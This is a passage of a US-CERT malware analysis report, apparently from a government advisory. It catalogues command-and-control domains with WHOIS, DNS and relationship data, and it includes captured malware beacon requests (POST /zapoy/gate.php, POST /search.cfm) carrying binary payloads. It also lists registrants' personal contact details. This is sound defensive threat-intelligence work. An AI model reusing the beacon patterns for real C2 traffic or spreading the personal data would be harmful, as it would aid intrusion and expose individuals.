Registrant Fax Ext:
Registrant Email: vnelson@moneypaper.com
Registry Admin ID:
Admin Name: Nelson, Vita
Admin Organization: Money Paper Inc
Admin Street: 411 THEODORE FREMD AVE
Admin City: RYE
Admin State/Province: NY
Admin Postal Code: 10580-1410
US-CERT MIFR-10105049-Update2
32 of 63
Admin Country: US
Admin Phone: +1.9149250022
Admin Phone Ext:
Admin Fax: +1.9149215745
Admin Fax Ext:
Admin Email: vnelson@moneypaper.com
Registry Tech ID:
Tech Name: Nelson, Vita
Tech Organization: Money Paper Inc
Tech Street: 411 THEODORE FREMD AVE
Tech City: RYE
Tech State/Province: NY
Tech Postal Code: 10580-1410
Tech Country: US
Tech Phone: +1.9149250022
Tech Phone Ext:
Tech Fax: +1.9149215745
Tech Fax Ext:
Tech Email: vnelson@moneypaper.com
Name Server: NS1.LNHI.NET
Name Server: NS2.LNHI.NET
Name Server: NS3.LNHI.NET
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/
>>> Last update of WHOIS database: 2017-01-16T12:56:12Z <<<
Network Whois record
Queried whois.arin.net with "n ! NET-204-12-12-32-1"...
NetRange:
204.12.12.32 - 204.12.12.63
CIDR:
204.12.12.32/27
NetName:
THEMONEYPAPERINC
NetHandle:
NET-204-12-12-32-1
Parent:
HOSTMYSITE (NET-204-12-0-0-1)
NetType:
Reassigned
OriginAS:
AS20021
Customer:
THE MONEYPAPER INC. (C02687180)
RegDate:
2011-02-03
Updated:
2011-02-03
Ref:
https[:]//whois.arin.net/rest/net/NET-204-12-12-32-1
CustName:
THE MONEYPAPER INC.
Address:
555 THEODORE FREMD AVENUE SUITE B-103
City:
StateProv:
PostalCode: 10580
Country:
RegDate:
2011-02-03
Updated:
2011-03-19
Ref:
https[:]//whois.arin.net/rest/customer/C02687180
OrgNOCHandle: IPADM271-ARIN
OrgNOCName: IP Admin
OrgNOCPhone: +1-302-731-4948
OrgNOCEmail: ipadmin@hostmysite.com
OrgNOCRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN
OrgTechHandle: IPADM271-ARIN
OrgTechName: IP Admin
OrgTechPhone: +1-302-731-4948
OrgTechEmail: ipadmin@hostmysite.com
OrgTechRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN
OrgAbuseHandle: ABUSE1072-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-302-731-4948
OrgAbuseEmail: abuse@hostmysite.com
OrgAbuseRef: https[:]//whois.arin.net/rest/poc/ABUSE1072-ARIN
RNOCHandle: IPADM271-ARIN
RNOCName: IP Admin
RNOCPhone: +1-302-731-4948
RNOCEmail: ipadmin@hostmysite.com
RNOCRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN
RTechHandle: IPADM271-ARIN
RTechName: IP Admin
RTechPhone: +1-302-731-4948
RTechEmail: ipadmin@hostmysite.com
US-CERT MIFR-10105049-Update2
33 of 63
RTechRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN
RAbuseHandle: IPADM271-ARIN
RAbuseName: IP Admin
RAbusePhone: +1-302-731-4948
RAbuseEmail: ipadmin@hostmysite.com
RAbuseRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN
DNS records
DNS query for 40.12.12.204.in-addr.arpa returned an error from the server: NameError
name
class
type data time to live
private.directinvesting.com IN A
204.12.12.40 3600s
(01:00:00)
directinvesting.com IN SOA
server: ns1.lnhi.net
email:
administrator@lnhi.net
serial:
refresh: 10800
retry:
3600
expire: 604800
minimum ttl: 3600
3600s
(01:00:00)
directinvesting.com IN NS ns3.lnhi.net
3600s
(01:00:00)
directinvesting.com IN NS ns1.lnhi.net
3600s
(01:00:00)
directinvesting.com IN NS ns2.lnhi.net
3600s
(01:00:00)
directinvesting.com IN A
204.12.12.41 3600s
(01:00:00)
directinvesting.com IN MX
preference:
exchange:
mail.moneypaper.com
3600s
(01:00:00)
Relationships
(D) private.directinvesting.com
Characterized_By
(W) Address lookup
(D) private.directinvesting.com
Connected_From
55058d3427ce932d8efcbe54dccf97c9a8d1e85c7
67814e34f4b2b6a6b305641 (8f154)
(D) private.directinvesting.com
Related_To
(H) GET /lexicon/index.c
(D) private.directinvesting.com
Related_To
(H) GET /lexicon/index.c
(D) private.directinvesting.com
Related_To
(H) GET /lexicon/index.c
(D) private.directinvesting.com
Related_To
(I) 204.12.12.40
Description
Identified Command and Control Location.
cderlearn.com
HTTP Sessions
POST /search.cfm HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
Host: www[.]cderlearn.com
Content-Length: 38
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
rss=a5ce5fa&pg=f8&sa=8816db73d479e8e35
POST /search.cfm HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
Host: www[.]cderlearn.com
Content-Length: 46
Cache-Control: no-cache
id=3&source=a804b4b73d479eebea&rss=53d0&ei=d3c
US-CERT MIFR-10105049-Update2
34 of 63
Whois
Address lookup
canonical name
cderlearn.com.
aliases
addresses
209.236.67.159
Domain Whois record
Queried whois.internic.net with "dom cderlearn.com"...
Domain Name: CDERLEARN.COM
Registrar: GODADDY.COM, LLC
Sponsoring Registrar IANA ID: 146
Whois Server: whois.godaddy.com
Referral URL: http[:]//www[.]godaddy.com
Name Server: NS1.WESTSERVERS.NET
Name Server: NS2.WESTSERVERS.NET
Status: clientDeleteProhibited https[:]//icann.org/epp#clientDeleteProhibited
Status: clientRenewProhibited https[:]//icann.org/epp#clientRenewProhibited
Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProh bited
Status: clientUpdateProhibited https[:]//icann.org/epp#clientUpdateProhibited
Updated Date: 03-feb-2016
Creation Date: 02-feb-2016
Expiration Date: 02-feb-2018
>>> Last update of whois database: Mon, 16 Jan 2017 12:57:44 GMT <<<
Queried whois.godaddy.com with "cderlearn.com"...
Domain Name: cderlearn.com
Registry Domain ID: 1999727892_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http[:]//www[.]godaddy.com
Update Date: 2016-02-02T20:49:41Z
Creation Date: 2016-02-02T20:49:41Z
Registrar Registration Expiration Date: 2018-02-02T20:49:41Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http[:]//www[.]icann.org/epp#clientTransferProh bited
Domain Status: clientUpdateProhibited http[:]//www[.]icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http[:]//www[.]icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http[:]//www[.]icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Craig Audley
Registrant Organization:
Registrant Street: 1 carpenters cottages
Registrant City: holt
Registrant State/Province: norfolk
Registrant Postal Code: nr256sa
Registrant Country: UK
Registrant Phone: +44.1263710645
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: craigaudley@gmail.com
Registry Admin ID: Not Available From Registry
Admin Name: Craig Audley
Admin Organization:
Admin Street: 1 carpenters cottages
Admin City: holt
Admin State/Province: norfolk
Admin Postal Code: nr256sa
Admin Country: UK
Admin Phone: +44.1263710645
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: craigaudley@gmail.com
Registry Tech ID: Not Available From Registry
Tech Name: Craig Audley
Tech Organization:
Tech Street: 1 carpenters cottages
Tech City: holt
US-CERT MIFR-10105049-Update2
35 of 63
Tech State/Province: norfolk
Tech Postal Code: nr256sa
Tech Country: UK
Tech Phone: +44.1263710645
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: craigaudley@gmail.com
Name Server: NS1.WESTSERVERS.NET
Name Server: NS2.WESTSERVERS.NET
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/
>>> Last update of WHOIS database: 2017-01-16T12:00:00Z <<<
Network Whois record
Queried secure.mpcustomer.com with "209.236.67.159"...
Queried whois.arin.net with "n 209.236.67.159"...
NetRange:
209.236.64.0 - 209.236.79.255
CIDR:
209.236.64.0/20
NetName:
WH-NET-209-236-64-0-1
NetHandle:
NET-209-236-64-0-1
Parent:
NET209 (NET-209-0-0-0-0)
NetType:
Direct Allocation
OriginAS:
AS29854
Organization: WestHost, Inc. (WESTHO)
RegDate:
2010-02-25
Updated:
2014-01-02
Ref:
https[:]//whois.arin.net/rest/net/NET-209-236-64-0-1
OrgName:
WestHost, Inc.
OrgId:
WESTHO
Address:
517 W 100 N STE 225
City:
Providence
StateProv:
PostalCode: 84332
Country:
RegDate:
2000-03-13
Updated:
2016-09-30
Comment:
Please report abuse issues to abuse@uk2group.com
Ref:
https[:]//whois.arin.net/rest/org/WESTHO
ReferralServer: rwhois://secure.mpcustomer.com:4321
OrgNOCHandle: NOC12189-ARIN
OrgNOCName: NOC
OrgNOCPhone: +1-435-755-3433
OrgNOCEmail: noc@uk2group.com
OrgNOCRef: https[:]//whois.arin.net/rest/poc/NOC12189-ARIN
OrgTechHandle: WESTH1-ARIN
OrgTechName: WestHost Inc
OrgTechPhone: +1-435-755-3433
OrgTechEmail: noc@uk2group.com
OrgTechRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN
OrgAbuseHandle: WESTH2-ARIN
OrgAbuseName: WestHost Abuse
OrgAbusePhone: +1-435-755-3433
OrgAbuseEmail: abuse@uk2group.com
OrgAbuseRef: https[:]//whois.arin.net/rest/poc/WESTH2-ARIN
RTechHandle: WESTH1-ARIN
RTechName: WestHost Inc
RTechPhone: +1-435-755-3433
RTechEmail: noc@uk2group.com
RTechRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN
RNOCHandle: WESTH1-ARIN
RNOCName: WestHost Inc
RNOCPhone: +1-435-755-3433
RNOCEmail: noc@uk2group.com
RNOCRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN
RAbuseHandle: WESTH2-ARIN
RAbuseName: WestHost Abuse
RAbusePhone: +1-435-755-3433
RAbuseEmail: abuse@uk2group.com
RAbuseRef: https[:]//whois.arin.net/rest/poc/WESTH2-ARIN
DNS records
US-CERT MIFR-10105049-Update2
36 of 63
name
class
type data time to live
cderlearn.com IN MX
preference:
exchange:
cderlearn.com
14400s (04:00:00)
cderlearn.com IN SOA
server: ns1.westservers.net
email:
hostmaster@westservers.net
serial:
2016020303
refresh: 86400
retry:
7200
expire: 604800
minimum ttl: 600
86400s (1.00:00:00)
cderlearn.com IN NS ns2.westservers.net
86400s (1.00:00:00)
cderlearn.com IN NS ns1.westservers.net
86400s (1.00:00:00)
cderlearn.com IN A
209.236.67.159
14400s (04:00:00)
159.67.236.209.in-addr.arpa IN PTR dl-573-57.slc.westdc.net 86400s (1.00:00:00)
67.236.209.in-addr.arpa IN SOA
server: ns1.westdc.net
email:
hostmaster@westdc.net
serial:
2010074157
refresh: 28800
retry:
7200
expire: 604800
minimum ttl: 600
86400s (1.00:00:00)
67.236.209.in-addr.arpa IN NS ns3.westdc.net
86400s (1.00:00:00)
67.236.209.in-addr.arpa IN NS ns1.westdc.net
86400s (1.00:00:00)
67.236.209.in-addr.arpa IN NS ns2.westdc.net
86400s (1.00:00:00)
Relationships
(D) cderlearn.com
Characterized_By
(W) Address lookup
(D) cderlearn.com
Connected_From
9acba7e5f972cdd722541a23ff314ea81ac35d5c0
c758eb708fb6e2cc4f598a0 (ae7e3)
(D) cderlearn.com
Related_To
(H) POST /search.cfm HTT
(D) cderlearn.com
Related_To
(H) POST /search.cfm HTT
(D) cderlearn.com
Related_To
(I) 209.236.67.159
Description
Identified Command and Control location.
wilcarobbe.com
Ports
HTTP Sessions
POST /zapoy/gate.php HTTP/1.0
Host: wilcarobbe.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 196
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
...[xXP..YG.....4...d...S.qO....4.....v..8 ..Y.u.
X..3S*3.S..%?.".).....>...
>V....H...;4.......OGf.'L..fB.N#.v[H.b_.{..w......j5
Whois
Address lookup
US-CERT MIFR-10105049-Update2
37 of 63
lookup failed wilcarobbe.com
A temporary error occurred during the lookup. Trying again may succeed.
Domain Whois record
Queried whois.internic.net with "dom wilcarobbe.com"...
Domain Name: WILCAROBBE.COM
Registrar: BIZCN.COM, INC.
Sponsoring Registrar IANA ID: 471
Whois Server: whois.bizcn.com
Referral URL: http[:]//www[.]bizcn.com
Name Server: NS0.XTREMEWEB.DE
Name Server: NS3.XTREMEWEB.DE
Status: clientDeleteProhibited https[:]//icann.org/epp#clientDeleteProhibited
Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProh bited
Updated Date: 07-nov-2016
Creation Date: 11-apr-2016
Expiration Date: 11-apr-2017
>>> Last update of whois database: Mon, 16 Jan 2017 13:05:45 GMT <<<
Queried whois.bizcn.com with "wilcarobbe.com"...
Domain name: wilcarobbe.com
Registry Domain ID: 2020708223_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.bizcn.com
Registrar URL: http[:]//www[.]bizcn.com
Updated Date: 2016-04-11T17:42:02Z
Creation Date: 2016-04-11T17:42:00Z
Registrar Registration Expiration Date: 2017-04-11T17:42:00Z
Registrar: Bizcn.com,Inc.
Registrar IANA ID: 471
Registrar Abuse Contact Email: abuse@bizcn.com
Registrar Abuse Contact Phone: +86.5922577888
Reseller: Cnobin Technology HK Limited
Domain Status: clientDeleteProhibited (http[:]//www[.]icann.org/epp#clientDeleteProhibited)
Domain Status: clientTransferProhibited (http[:]//www[.]icann.org/epp#clientTransferProhibited)
Registry Registrant ID:
Registrant Name: Arsen Ramzanov
Registrant Organization: NA
Registrant Street: Zlatoustskaya str, 14 fl 2
Registrant City: Sadovoye
Registrant State/Province: Groznenskaya obl
Registrant Postal Code: 366041
Registrant Country: ru
Registrant Phone: +7.4959795033
Registrant Phone Ext:
Registrant Fax: +7.4959795033
Registrant Fax Ext:
Registrant Email: arsen.ramzanov@yandex.ru
Registry Admin ID:
Admin Name: Arsen Ramzanov
Admin Organization: NA
Admin Street: Zlatoustskaya str, 14 fl 2
Admin City: Sadovoye
Admin State/Province: Groznenskaya obl
Admin Postal Code: 366041
Admin Country: ru
Admin Phone: +7.4959795033
Admin Phone Ext:
Admin Fax: +7.4959795033
Admin Fax Ext:
Admin Email: arsen.ramzanov@yandex.ru
Registry Tech ID:
Tech Name: Arsen Ramzanov
Tech Organization: NA
Tech Street: Zlatoustskaya str, 14 fl 2
Tech City: Sadovoye
Tech State/Province: Groznenskaya obl
Tech Postal Code: 366041
Tech Country: ru
Tech Phone: +7.4959795033
Tech Phone Ext:
Tech Fax: +7.4959795033
Tech Fax Ext:
US-CERT MIFR-10105049-Update2
38 of 63
Tech Email: arsen.ramzanov@yandex.ru
Name Server: ns0.xtremeweb.de
Name Server: ns3.xtremeweb.de
DNSSEC: unsignedDelegation
URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/
>>> Last update of WHOIS database: 2017-01-16T13:06:08Z
Network Whois record
Don't have an IP address for which to get a record
DNS records
DNS query for wilcarobbe.com returned an error from the server: ServerFailure
No records to display
Relationships
(D) wilcarobbe.com
Characterized_By
(W) Address lookup
(D) wilcarobbe.com
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) wilcarobbe.com
Related_To
(H) POST /zapoy/gate.php
(D) wilcarobbe.com
Related_To
(P) 80
Description
Identified Command and Control Location.
one2shoppee.com
Ports
Whois
Address lookup
canonical name
one2shoppee.com.
aliases
addresses
2604:5800:0:23::8
69.195.129.72
Domain Whois record
Queried whois.internic.net with "dom one2shoppee.com"...
Domain Name: ONE2SHOPPEE.COM
Registrar: DYNADOT, LLC
Sponsoring Registrar IANA ID: 472
Whois Server: whois.dynadot.com
Referral URL: http[:]//www[.]dynadot.com
Name Server: NS1.DYNADOT.COM
Name Server: NS2.DYNADOT.COM
Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProh bited
Updated Date: 05-jan-2017
Creation Date: 05-jan-2017
Expiration Date: 05-jan-2018
>>> Last update of whois database: Mon, 16 Jan 2017 13:01:15 GMT <<<
Queried whois.dynadot.com with "one2shoppee.com"...
Domain Name: ONE2SHOPPEE.COM
Registry Domain ID: 2087544116_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.dynadot.com
Registrar URL: http[:]//www[.]dynadot.com
Updated Date: 2017-01-05T10:40:34.0Z
Creation Date: 2017-01-05T10:40:32.0Z
Registrar Registration Expiration Date: 2018-01-05T10:40:32.0Z
Registrar: DYNADOT LLC
Registrar IANA ID: 472
Registrar Abuse Contact Email: abuse@dynadot.com
Registrar Abuse Contact Phone: +1.6502620100
Domain Status: clientTransferProhibited
Registry Registrant ID:
Registrant Name: Authorized Representative
Registrant Organization: Kleissner & Associates s.r.o.
Registrant Street: Na strzi 1702/65
Registrant City: Praha
Registrant Postal Code: 140 00
US-CERT MIFR-10105049-Update2
39 of 63
Registrant Country: CZ
Registrant Phone: +420.00000000
Registrant Email: domains@virustracker.info
Registry Admin ID:
Admin Name: Authorized Representative
Admin Organization: Kleissner & Associates s.r.o.
Admin Street: Na strzi 1702/65
Admin City: Praha
Admin Postal Code: 140 00
Admin Country: CZ
Admin Phone: +420.00000000
Admin Email: domains@virustracker.info
Registry Tech ID:
Tech Name: Authorized Representative
Tech Organization: Kleissner & Associates s.r.o.
Tech Street: Na strzi 1702/65
Tech City: Praha
Tech Postal Code: 140 00
Tech Country: CZ
Tech Phone: +420.00000000
Tech Email: domains@virustracker.info
Name Server: ns1.dynadot.com
Name Server: ns2.dynadot.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/
>>> Last update of WHOIS database: 2017-01-16 04:56:51 -0800 <<<
Network Whois record
Whois query for 69.195.129.72 failed: TimedOut
Queried whois.arin.net with "n 69.195.129.72"...
NetRange:
69.195.128.0 - 69.195.159.255
CIDR:
69.195.128.0/19
NetName:
JOESDC-01
NetHandle:
NET-69-195-128-0-1
Parent:
NET69 (NET-69-0-0-0-0)
NetType:
Direct Allocation
OriginAS:
AS19969
Organization: Joe's Datacenter, LLC (JOESD)
RegDate:
2010-07-09
Updated:
2015-03-06
Ref:
https[:]//whois.arin.net/rest/net/NET-69-195-128-0-1
OrgName:
Joe's Datacenter, LLC
OrgId:
JOESD
Address:
1325 Tracy Ave
City:
Kansas City
StateProv:
PostalCode: 64106
Country:
RegDate:
2009-08-21
Updated:
2014-06-28
Ref:
https[:]//whois.arin.net/rest/org/JOESD
ReferralServer: rwhois://support.joesdatacenter.com:4321
OrgAbuseHandle: NAA25-ARIN
OrgAbuseName: Network Abuse Administrator
OrgAbusePhone: +1-816-726-7615
OrgAbuseEmail: security@joesdatacenter.com
OrgAbuseRef: https[:]//whois.arin.net/rest/poc/NAA25-ARIN
OrgTechHandle: JPM84-ARIN
OrgTechName: Morgan, Joe Patrick
OrgTechPhone: +1-816-726-7615
OrgTechEmail: joe@joesdatacenter.com
OrgTechRef: https[:]//whois.arin.net/rest/poc/JPM84-ARIN
OrgNOCHandle: JPM84-ARIN
OrgNOCName: Morgan, Joe Patrick
OrgNOCPhone: +1-816-726-7615
OrgNOCEmail: joe@joesdatacenter.com
OrgNOCRef: https[:]//whois.arin.net/rest/poc/JPM84-ARIN
RAbuseHandle: NAA25-ARIN
RAbuseName: Network Abuse Administrator
RAbusePhone: +1-816-726-7615
RAbuseEmail: security@joesdatacenter.com
RAbuseRef: https[:]//whois.arin.net/rest/poc/NAA25-ARIN
US-CERT MIFR-10105049-Update2
40 of 63
RNOCHandle: JPM84-ARIN
RNOCName: Morgan, Joe Patrick
RNOCPhone: +1-816-726-7615
RNOCEmail: joe@joesdatacenter.com
RNOCRef: https[:]//whois.arin.net/rest/poc/JPM84-ARIN
RTechHandle: JPM84-ARIN
RTechName: Morgan, Joe Patrick
RTechPhone: +1-816-726-7615
RTechEmail: joe@joesdatacenter.com
RTechRef: https[:]//whois.arin.net/rest/poc/JPM84-ARIN
DNS records
DNS query for 72.129.195.69.in-addr.arpa returned an error from the server: NameError
DNS query for 8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.2.0.0.0.0.0.0.0.0.8.5.4.0.6.2.ip6.arpa returned an error from the server: NameError
name
class
type data time to live
one2shoppee.com IN SOA
server: ns1.dynadot.com
email:
hostmaster@one2shoppee.com
serial:
1484571411
refresh: 16384
retry:
2048
expire: 1048576
minimum ttl: 2560
2560s
(00:42:40)
one2shoppee.com IN NS ns1.dynadot.com 10800s (03:00:00)
one2shoppee.com IN NS ns2.dynadot.com 10800s (03:00:00)
one2shoppee.com IN AAAA
2604:5800:0:23::8 10800s (03:00:00)
one2shoppee.com IN A
69.195.129.72 10800s (03:00:00)
Relationships
(D) one2shoppee.com
Characterized_By
(W) Address lookup
(D) one2shoppee.com
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) one2shoppee.com
Related_To
(P) 80
Description
Identified Command and Control Location.
ritsoperrol.ru
Ports
HTTP Sessions
POST /zapoy/gate.php HTTP/1.0
Host: ritsoperrol.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 196
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
...[xXP..YG.....4...d...S.qO....4.....v..8 ..Y.u.
X..3S*3.S..%?.".).....>...
>V....H...;4.......OGf.'L..fB.N#.v[H.b_.{..w......j5
Whois
Address lookup
lookup failed ritsoperrol.ru
A temporary error occurred during the lookup. Trying again may succeed.
Domain Whois record
Queried whois.nic.ru with "ritsoperrol.ru"...
No entries found for the selected source(s).
US-CERT MIFR-10105049-Update2
41 of 63
>>> Last update of WHOIS database: 2017.01.16T13:04:09Z <<<
Network Whois record
Don't have an IP address for which to get a record
DNS records
DNS query for ritsoperrol.ru returned an error from the server: ServerFailure
No records to display
Relationships
(D) ritsoperrol.ru
Characterized_By
(W) Address lookup
(D) ritsoperrol.ru
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) ritsoperrol.ru
Related_To
(P) 80
(D) ritsoperrol.ru
Related_To
(H) POST /zapoy/gate.php
Description
Identified Command and Control Location.
littjohnwilhap.ru
Ports
HTTP Sessions
POST /zapoy/gate.php HTTP/1.0
Host: littjohnwilhap.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 196
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
...[xXP..YG.....4...d...S.qO....4.....v..8 ..Y.u.
X..3S*3.S..%?.".).....>...
>V....H...;4.......OGf.'L..fB.N#.v[H.b_.{..w......j5
Whois
Address lookup
lookup failed littjohnwilhap.ru
Could not find an IP address for this domain name.
Domain Whois record
Queried whois.nic.ru with "littjohnwilhap.ru"...
No entries found for the selected source(s).
>>> Last update of WHOIS database: 2017.01.16T13:05:16Z <<<
Network Whois record
Don't have an IP address for which to get a record
DNS records
DNS query for littjohnwilhap.ru returned an error from the server: NameError
No records to display
Relationships
(D) littjohnwilhap.ru
Characterized_By
(W) Address lookup
(D) littjohnwilhap.ru
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) littjohnwilhap.ru
Related_To
(H) POST /zapoy/gate.php
(D) littjohnwilhap.ru
Related_To
(P) 80
Description
US-CERT MIFR-10105049-Update2
42 of 63
Identified Command and Control Location.
insta.reduct.ru
Ports
Whois
Address lookup
canonical name
insta.reduct.ru.
aliases
addresses
146.185.161.126
Domain Whois record
Queried whois.nic.ru with "reduct.ru"...
domain:
REDUCT.RU
nserver:
ns1.spaceweb.ru
nserver:
ns2.spaceweb.ru
state:
REGISTERED, DELEGATED
person:
Private person
admin-contact:https[:]//www[.]nic.ru/cgi/whois_webmail.cgi?domain=REDUCT.RU
registrar: RU-CENTER-RU
created:
2009.03.13
paid-till: 2017.03.13
source:
RU-CENTER
>>> Last update of WHOIS database: 2017.01.16T13:00:25Z <<<
Network Whois record
Queried whois.ripe.net with "-B 146.185.161.126"...
% Information related to '146.185.160.0 - 146.185.167.255'
% Abuse contact for '146.185.160.0 - 146.185.167.255' is 'abuse@digitalocean.com'
inetnum:
146.185.160.0 - 146.185.167.255
netname:
DIGITALOCEAN-AMS-3
descr:
Digital Ocean, Inc.
country:
admin-c:
PT7353-RIPE
tech-c:
PT7353-RIPE
status:
ASSIGNED PA
mnt-by:
digitalocean
mnt-lower:
digitalocean
mnt-routes: digitalocean
created:
2013-09-17T17:13:25Z
last-modified: 2015-11-20T14:45:22Z
source:
RIPE
person:
Network Operations
address:
101 Ave of the Americas, 10th Floor, New York, NY 10013
phone:
+13478756044
nic-hdl:
PT7353-RIPE
mnt-by:
digitalocean
created:
2015-03-11T16:37:07Z
last-modified: 2015-11-19T15:57:21Z
source:
RIPE
e-mail:
noc@digitalocean.com
org:
ORG-DOI2-RIPE
% This query was served by the RIPE Database Query Service version 1.88 (WAGYU)
DNS records
DNS query for 126.161.185.146.in-addr.arpa returned an error from the server: NameError
name
class
type data time to live
insta.reduct.ru IN A
146.185.161.126 600s(00:10:00)
reduct.ru IN SOA
server: ns1.spaceweb.ru
email:
dns1@sweb.ru
serial:
2010022878
refresh: 28800
retry:
7200
expire: 604800
minimum ttl: 600
600s(00:10:00)
reduct.ru IN A
77.222.42.238 600s(00:10:00)
reduct.ru IN NS ns3.spaceweb.pro 600s(00:10:00)
reduct.ru IN NS ns1.spaceweb.ru 600s(00:10:00)
US-CERT MIFR-10105049-Update2
43 of 63
reduct.ru IN NS ns2.spaceweb.ru 600s(00:10:00)
reduct.ru IN NS ns4.spaceweb.pro 600s(00:10:00)
reduct.ru IN MX
preference:
exchange:
mx1.spaceweb.ru
600s(00:10:00)
reduct.ru IN MX
preference:
exchange:
mx2.spaceweb.ru
600s(00:10:00)
Relationships
(D) insta.reduct.ru
Characterized_By
(W) Address lookup
(D) insta.reduct.ru
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) insta.reduct.ru
Related_To
(P) 80
(D) insta.reduct.ru
Related_To
(I) 146.185.161.126
Description
Identified Command and Control Location.
editprod.waterfilter.in.ua
Ports
Whois
Address lookup
canonical name
editprod.waterfilter.in.ua.
aliases
addresses
176.114.0.120
Domain Whois record
Queried whois.ua with "waterfilter.in.ua"...
% request from 209.200.70.26
% This is the Ukrainian Whois query server #I.
% The Whois is subject to Terms of use
% See https[:]//hostmaster.ua/services/
% The object shown below is NOT in the UANIC database.
% It has been obtained by querying a remote server:
% (whois.in.ua) at port 43.
% REDIRECT BEGIN
% In.UA whois server. (whois.in.ua)
% All questions regarding this service please send to help@whois.in.ua
% To search for domains and In.UA maintainers using the web, visit http[:]//whois.in.ua
domain:
waterfilter.in.ua
descr:
waterfilter.in.ua
admin-c: THST-UANIC
tech-c:
THST-UANIC
status:
OK-UNTIL 20170310000000
nserver: ns1.thehost.com.ua
nserver: ns2.thehost.com.ua
nserver: ns3.thehost.com.ua
mnt-by:
THEHOST-MNT-INUA
mnt-lower: THEHOST-MNT-INUA
changed: hostmaster@thehost.com.ua 20160224094245
source:
INUA
% REDIRECT END
Network Whois record
Queried whois.ripe.net with "-B 176.114.0.120"...
% Information related to '176.114.0.0 - 176.114.15.255'
% Abuse contact for '176.114.0.0 - 176.114.15.255' is 'abuse@thehost.ua'
inetnum:
176.114.0.0 - 176.114.15.255
netname:
THEHOST-NETWORK-3
country:
org:
ORG-FSOV1-RIPE
US-CERT MIFR-10105049-Update2
44 of 63
admin-c:
SA7501-RIPE
tech-c:
SA7501-RIPE
status:
ASSIGNED PI
mnt-by:
RIPE-NCC-END-MNT
mnt-by:
THEHOST-MNT
mnt-routes: THEHOST-MNT
mnt-domains: THEHOST-MNT
created:
2012-04-10T13:34:51Z
last-modified: 2016-04-14T10:45:42Z
source:
RIPE
sponsoring-org: ORG-NL64-RIPE
organisation: ORG-FSOV1-RIPE
org-name:
FOP Sedinkin Olexandr Valeriyovuch
org-type:
other
address:
08154, Ukraine, Boyarka, Belogorodskaya str., 11a
e-mail:
info@thehost.ua
abuse-c:
AR19055-RIPE
abuse-mailbox: abuse@thehost.ua
remarks:
----------------------------------------------------remarks:
Hosting Provider TheHost
remarks:
----------------------------------------------------remarks:
For abuse/spam issues contact abuse@thehost.ua
remarks:
For general/sales questions contact info@thehost.ua
remarks:
For technical support contact support@thehost.ua
remarks:
----------------------------------------------------phone:
+380 44 222-9-888
phone:
+7 499 403-36-28
fax-no:
+380 44 222-9-888 ext. 4
admin-c:
SA7501-RIPE
mnt-ref:
THEHOST-MNT
mnt-by:
THEHOST-MNT
created:
